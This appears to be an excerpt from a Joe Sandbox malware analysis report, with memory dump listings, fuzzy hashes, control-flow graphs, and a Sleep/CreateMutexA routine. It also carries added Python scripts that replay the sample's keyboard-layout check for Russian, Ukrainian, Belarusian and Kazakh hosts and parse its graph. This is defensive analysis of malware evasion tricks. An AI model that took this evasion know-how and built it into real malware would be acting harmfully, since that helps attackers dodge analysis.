• Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_50000_file.jbxd
Yara matches
Similarity
• API ID:
• String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
• API String ID: 0-3963862150
• Opcode ID: f5adca7cf27daac9b2e004b0055367c6425f02a40210b21dcfe5903ed924c601
• Instruction ID: dfce6da7762b4b262ea70637fb101b8444fbcbaf002bf5bcbeb9a9130b689522
• Opcode Fuzzy Hash: f5adca7cf27daac9b2e004b0055367c6425f02a40210b21dcfe5903ed924c601
• Instruction Fuzzy Hash: 32F1D3709002489FEB24DF54CC85BDEBBB9EF45304F5046A9F908A7282DB759A88CF95
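The string table of the function above pairs the registry path `Keyboard Layout\Preload` with four 8-character keyboard-layout identifiers. Their low 16 bits are the Windows language IDs 0x0419 (ru-RU), 0x0422 (uk-UA), 0x0423 (be-BY) and 0x043F (kk-KZ), which is the usual shape of a "do not run on CIS hosts" gate. The report only shows the strings, not the comparison logic, so the example below is an added illustration (not code from the sample or from Joe Sandbox) of how an analyst would replay that gate against exported Preload values. It assumes the sample compares each Preload value against those literals; the registry values are constructed here so the code runs offline, and the `exact_string_match` switch exists only to show why a literal string compare and a language-ID compare can disagree.

```python
"""Replay a Keyboard Layout\\Preload locale gate against exported registry values.

Added example for the analysis above; not the sample's own code. The four
identifiers come from the function's string table; the locale names are the
standard Windows LCID assignments for those language IDs.
"""
from dataclasses import dataclass

# Language IDs taken from the string table: 00000419$00000422$00000423$0000043f
GATED_LANG_IDS = {
    0x0419: "ru-RU",
    0x0422: "uk-UA",
    0x0423: "be-BY",
    0x043F: "kk-KZ",
}


@dataclass(frozen=True)
class PreloadEntry:
    value_name: str    # "1", "2", ... : the order in which layouts are preloaded
    klid: int          # full 32-bit keyboard layout identifier
    lang_id: int       # low 16 bits: primary + sub language
    substitute: bool   # non-zero high word: substituted / IME / custom layout


def parse_preload(values: dict[str, str]) -> list[PreloadEntry]:
    """values: name -> data as exported from HKCU\\Keyboard Layout\\Preload.

    Each value is REG_SZ holding 8 hex characters. Malformed entries are
    skipped rather than treated as a match, because a non-matching value is
    the conservative answer when replaying an evasion check.
    """
    entries = []
    for name, data in values.items():
        data = data.strip()
        if len(data) != 8:
            continue
        try:
            klid = int(data, 16)
        except ValueError:
            continue
        entries.append(PreloadEntry(name, klid, klid & 0xFFFF, (klid >> 16) != 0))
    # Preload order matters on a real host (value "1" is the default layout).
    return sorted(entries, key=lambda e: int(e.value_name) if e.value_name.isdigit() else 1 << 30)


def matched_locales(values: dict[str, str]) -> list[str]:
    """Locale names from GATED_LANG_IDS present in the exported Preload values."""
    hits = {GATED_LANG_IDS[e.lang_id] for e in parse_preload(values) if e.lang_id in GATED_LANG_IDS}
    return sorted(hits)


def would_be_gated(values: dict[str, str], exact_string_match: bool = False) -> bool:
    """True if this host's preloaded layouts would trip the gate.

    exact_string_match=True mimics a naive compare against the 8-character
    literals from the string table. That variant misses a substituted layout
    such as d0010419 (assumed example), whose low word is still 0x0419.
    """
    if exact_string_match:
        literals = {f"{lid:08x}" for lid in GATED_LANG_IDS}
        return any(v.strip().lower() in literals for v in values.values())
    return bool(matched_locales(values))


if __name__ == "__main__":
    # Constructed sample exports, not taken from the report.
    hosts = {
        "en-US only": {"1": "00000409"},
        "en-US + ru-RU": {"1": "00000409", "2": "00000419"},
        "substituted ru layout": {"1": "d0010419"},
    }
    for label, export in hosts.items():
        print(f"{label:24s} gated={would_be_gated(export)!s:5s} "
              f"literal-compare={would_be_gated(export, exact_string_match=True)!s:5s} "
              f"matches={matched_locales(export)}")
```

When reproducing the gate in a live VM, export the key with `reg query "HKCU\Keyboard Layout\Preload"` and feed the name/data pairs to `would_be_gated`; adding a second layout whose language ID is one of the four above is enough to see whether the sample exits early, which is useful when a detonation finishes suspiciously fast.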

Control-flow Graph (image not reproduced)
control_flow_graph 219 59ba5-59d91 call 67a00 call 55c10 call 58b30 call 68220
APIs
• Sleep.KERNEL32(00000064), ref: 0005A963
• CreateMutexA.KERNEL32(00000000,00000000,000B3254), ref: 0005A981
Memory Dump Source
• Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
• Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_50000_file.jbxd
Yara matches
Similarity
• API ID: CreateMutexSleep
• String ID:
• API String ID: 1464230837-0
• Opcode ID: c9cb37624e1c0f1a792ec28daa8a661c02eb3b2e4e918085bbf87e4bcb39b8e6
• Instruction ID: 07a30bda0a5cb12b23f0191422e37494006a567d5ca000c52019ee9847d9240e
• Opcode Fuzzy Hash: c9cb37624e1c0f1a792ec28daa8a661c02eb3b2e4e918085bbf87e4bcb39b8e6
• Instruction Fuzzy Hash: 54312A31704244CBFB089B6CDD897AFBBA2EB82312F248718E414DB3D6C77599848752

Control-flow Graph
Legend (node colour in the rendered graph): Executed / Not Executed
Basic blocks (node id: address range, labels):
241: 59f44-59f64
245: 59f66-59f72
246: 59f92-59fae
247: 59f74-59f82
248: 59f88-59f8f, call 6d663
249: 59fb0-59fbc
250: 59fdc-59ffb
251: 5a92b
253: 59fd2-59fd9, call 6d663
254: 59fbe-59fcc
255: 59ffd-5a009
256: 5a029-5a916, call 680c0
258: 5a953-5a994, Sleep, CreateMutexA
259: 5a92b, call 86c6a
262: 5a01f-5a026, call 6d663
263: 5a00b-5a019
271: 5a9a7-5a9a8
272: 5a996-5a998
273: 5a99a-5a9a5
Edges: 241->245, 241->246, 245->247, 245->248, 246->249, 246->250, 247->248, 247->251, 248->246, 249->253, 249->254, 250->255, 250->256, 251->258, 251->259, 253->250, 254->251, 254->253, 255->262, 255->263, 258->271, 258->272, 259->258, 262->256, 263->251, 263->262, 272->271, 272->273, 273->271
APIs
• Sleep.KERNEL32(00000064), ref: 0005A963
• CreateMutexA.KERNEL32(00000000,00000000,000B3254), ref: 0005A981
Both call sites lie in basic block 258 (5a953-5a994). Sleep is called with 0x64 = 100 ms. CreateMutexA is called with lpMutexAttributes = NULL, bInitialOwner = FALSE and lpName pointing at 0x000B3254; the name string itself is not resolved in this entry, so the mutex name has to be read from the memory dump covering that address.
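The control-flow graph above is exported as a flat node/edge dump. The following script is an example added here; it is not part of the Joe Sandbox report or its tooling. It parses that text, maps the two call-site addresses from the APIs list onto the basic block that contains them, and reports which blocks lead into the CreateMutexA block and which function exits can never pass through it. The CFG text and the two addresses are copied verbatim from this entry; the grammar of the dump (a decimal node id, then a hex address or hex range, then optional `call <hex>` or API-name labels, and `a->b` edges) is inferred from that text and is an assumption, not a documented format.

```python
"""Parse and query the text form of a Joe Sandbox control-flow graph (added example)."""
import re
from collections import defaultdict

# Copied from the report's Control-flow Graph entry for the Sleep/CreateMutexA function.
CFG_TEXT = (
    "control_flow_graph 241 59f44-59f64 245 59f66-59f72 241->245 246 59f92-59fae 241->246 "
    "247 59f74-59f82 245->247 248 59f88-59f8f call 6d663 245->248 249 59fb0-59fbc 246->249 "
    "250 59fdc-59ffb 246->250 247->248 251 5a92b 247->251 248->246 253 59fd2-59fd9 call 6d663 "
    "249->253 254 59fbe-59fcc 249->254 255 59ffd-5a009 250->255 256 5a029-5a916 call 680c0 "
    "250->256 258 5a953-5a994 Sleep CreateMutexA 251->258 259 5a92b call 86c6a 251->259 "
    "253->250 254->251 254->253 262 5a01f-5a026 call 6d663 255->262 263 5a00b-5a019 255->263 "
    "271 5a9a7-5a9a8 258->271 272 5a996-5a998 258->272 259->258 262->256 263->251 263->262 "
    "272->271 273 5a99a-5a9a5 272->273 273->271"
)
# Copied from the report's APIs entry: imported API -> call-site address.
API_REFS = {"Sleep": 0x5A963, "CreateMutexA": 0x5A981}

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
RANGE_RE = re.compile(r"^([0-9a-f]+)(?:-([0-9a-f]+))?$")


def parse_cfg(text):
    """Return (nodes, edges); nodes maps id -> {start, end, calls, apis}.

    Grammar is inferred from the dump (assumption): a decimal token starts a node and
    is followed by its hex address or range; 'call X' and bare API names label the
    most recent node; 'a->b' tokens are edges.
    """
    nodes, edges = {}, []
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    i, current = 0, None
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
            i += 1
        elif tok.isdigit():
            rng = RANGE_RE.match(tokens[i + 1])
            if rng is None:
                raise ValueError(f"bad address range {tokens[i + 1]!r} after node {tok}")
            start = int(rng.group(1), 16)
            end = int(rng.group(2), 16) if rng.group(2) else start
            current = int(tok)
            nodes[current] = {"start": start, "end": end, "calls": [], "apis": []}
            i += 2
        elif tok == "call":
            nodes[current]["calls"].append(int(tokens[i + 1], 16))  # internal call target
            i += 2
        else:
            nodes[current]["apis"].append(tok)  # imported API resolved in this block
            i += 1
    return nodes, edges


def block_containing(nodes, addr):
    """Id of the first basic block whose address range covers addr, or None."""
    for nid, n in nodes.items():
        if n["start"] <= addr <= n["end"]:
            return nid
    return None


def ancestors(edges, target):
    """Every node from which target is reachable (target itself excluded)."""
    preds = defaultdict(set)
    for src, dst in edges:
        preds[dst].add(src)
    seen, stack = set(), [target]
    while stack:
        for p in preds[stack.pop()]:
            if p not in seen:
                seen.add(p)
                stack.append(p)
    seen.discard(target)
    return seen


def exit_blocks(nodes, edges):
    """Blocks with no successor, i.e. where control leaves the function."""
    has_succ = {src for src, _ in edges}
    return sorted(n for n in nodes if n not in has_succ)


def mutex_path_summary(text=CFG_TEXT, api_refs=API_REFS):
    """Locate the CreateMutexA block and report what leads into it and what bypasses it."""
    nodes, edges = parse_cfg(text)
    api_block = {name: block_containing(nodes, addr) for name, addr in api_refs.items()}
    mutex = api_block["CreateMutexA"]
    exits = exit_blocks(nodes, edges)
    return {
        "nodes": len(nodes),
        "edges": len(edges),
        "api_block": api_block,
        "reach_mutex": sorted(ancestors(edges, mutex)),
        "exits": exits,
        # Exits the mutex block cannot reach at all: every path into them skips CreateMutexA.
        "exits_bypassing_mutex": [e for e in exits if mutex not in ancestors(edges, e)],
    }


if __name__ == "__main__":
    for key, value in mutex_path_summary().items():
        print(f"{key}: {value}")
```

On this entry the script places both call sites in block 258 (5a953-5a994), which is entered only from the two nodes at 5a92b (251 and its call split 259). The function has two exits: 271, which is only reachable through the mutex block, and 256, the large 5a029-5a916 block ending in `call 680c0`, which the mutex block never reaches. In other words the Sleep/CreateMutexA pair sits on one of two outgoing paths, not on every path through the function, so a detection that assumes the mutex is always created before the sample proceeds would be wrong. The mutex name at 0x000B3254 is not in the graph; it most likely lives in the 0x0B2000 dump listed under Memory Dump Source, which is where to look it up.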
Memory Dump Source
• Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
• Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                • Opcode ID: 6b34dbf020dabad82c68a31b48c4f9406d09070b0085bcd70b6b39c5af1631b0
                                                                                                                                                                                                                                • Instruction ID: 68cdb2be17ced153299bb8750355a1041719d7973312b1c7fcdb482a2f9d75af
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6b34dbf020dabad82c68a31b48c4f9406d09070b0085bcd70b6b39c5af1631b0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C315B31700244DBEB18DB7CDC897AEB7A2EF86312F248719E814DB3D5C77599888752

Control-flow Graph (basic blocks: node id, address range, calls and imported APIs, successors)
• 275: 5a079-5a099 -> 279, 280
• 279: 5a0c7-5a0e3 -> 283, 284
• 280: 5a09b-5a0a7 -> 281, 282
• 281: 5a0bd-5a0c4, call 6d663 -> 279
• 282: 5a0a9-5a0b7 -> 281, 285
• 283: 5a0e5-5a0f1 -> 287, 288
• 284: 5a111-5a130 -> 289, 290
• 285: 5a930 -> 293, 294
• 287: 5a107-5a10e, call 6d663 -> 284
• 288: 5a0f3-5a101 -> 285, 287
• 289: 5a132-5a13e -> 296, 297
• 290: 5a15e-5a916, call 680c0 -> (none)
• 293: 5a953-5a994, Sleep, CreateMutexA -> 305, 306
• 294: 5a930, call 86c6a -> 293
• 296: 5a154-5a15b, call 6d663 -> 290
• 297: 5a140-5a14e -> 285, 296
• 305: 5a9a7-5a9a8 -> (none)
• 306: 5a996-5a998 -> 305, 307
• 307: 5a99a-5a9a5 -> 305
APIs
• Sleep.KERNEL32(00000064), ref: 0005A963
• CreateMutexA.KERNEL32(00000000,00000000,000B3254), ref: 0005A981
Memory Dump Source
• Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
• Associated: the same set of memory dumps as listed for the previous function
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_50000_file.jbxd
Yara matches
Similarity
• API ID: CreateMutexSleep
• String ID:
• API String ID: 1464230837-0
• Opcode ID: 8924c4dd57d97b84ab042c4cecfb3d31f600929db512929d3e9a61a8e9f58ee0
• Instruction ID: a25139e619dfdbc413ee77033291d36146d8e537c6292248b815b566b9aa4b86
• Opcode Fuzzy Hash: 8924c4dd57d97b84ab042c4cecfb3d31f600929db512929d3e9a61a8e9f58ee0
• Instruction Fuzzy Hash: 43314A31B101449BEF189B78DC897AEB762DB83312F204719E814DB3D5C77599848767

Control-flow Graph (basic blocks: node id, address range, calls and imported APIs, successors)
• 309: 5a1ae-5a1ce -> 313, 314
• 313: 5a1d0-5a1dc -> 315, 316
• 314: 5a1fc-5a218 -> 317, 318
• 315: 5a1f2-5a1f9, call 6d663 -> 314
• 316: 5a1de-5a1ec -> 315, 319
• 317: 5a246-5a265 -> 323, 324
• 318: 5a21a-5a226 -> 321, 322
• 319: 5a935 -> 327, 328
• 321: 5a23c-5a243, call 6d663 -> 317
• 322: 5a228-5a236 -> 319, 321
• 323: 5a267-5a273 -> 330, 331
• 324: 5a293-5a916, call 680c0 -> (none)
• 327: 5a953-5a994, Sleep, CreateMutexA -> 339, 340
• 328: 5a935, call 86c6a -> 327
• 330: 5a275-5a283 -> 319, 331
• 331: 5a289-5a290, call 6d663 -> 324
• 339: 5a9a7-5a9a8 -> (none)
• 340: 5a996-5a998 -> 339, 341
• 341: 5a99a-5a9a5 -> 339
APIs
• Sleep.KERNEL32(00000064), ref: 0005A963
• CreateMutexA.KERNEL32(00000000,00000000,000B3254), ref: 0005A981
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                • Opcode ID: fa7e48265b2f7ef512384e8e17884a04751e1bb14fbea1c46ae0c0fc4afec432
                                                                                                                                                                                                                                • Instruction ID: 6085ec9b149a200cef5c48ecc8b218efe6534ccc1ec6c07637c3ad305c4be588
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fa7e48265b2f7ef512384e8e17884a04751e1bb14fbea1c46ae0c0fc4afec432
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A312C31B002409BEB18DB7CDC897AFB762EB87312F244719E414DB3D5D77599848762

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
[Control-flow graph of the function starting at 5a418 (basic blocks 5a418 through 5a9a8; calls to 6d663, 86c6a, 680c0, Sleep and CreateMutexA); the raw edge list rendered here in the original is not reproduced.]
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 0005A963
                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,000B3254), ref: 0005A981
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
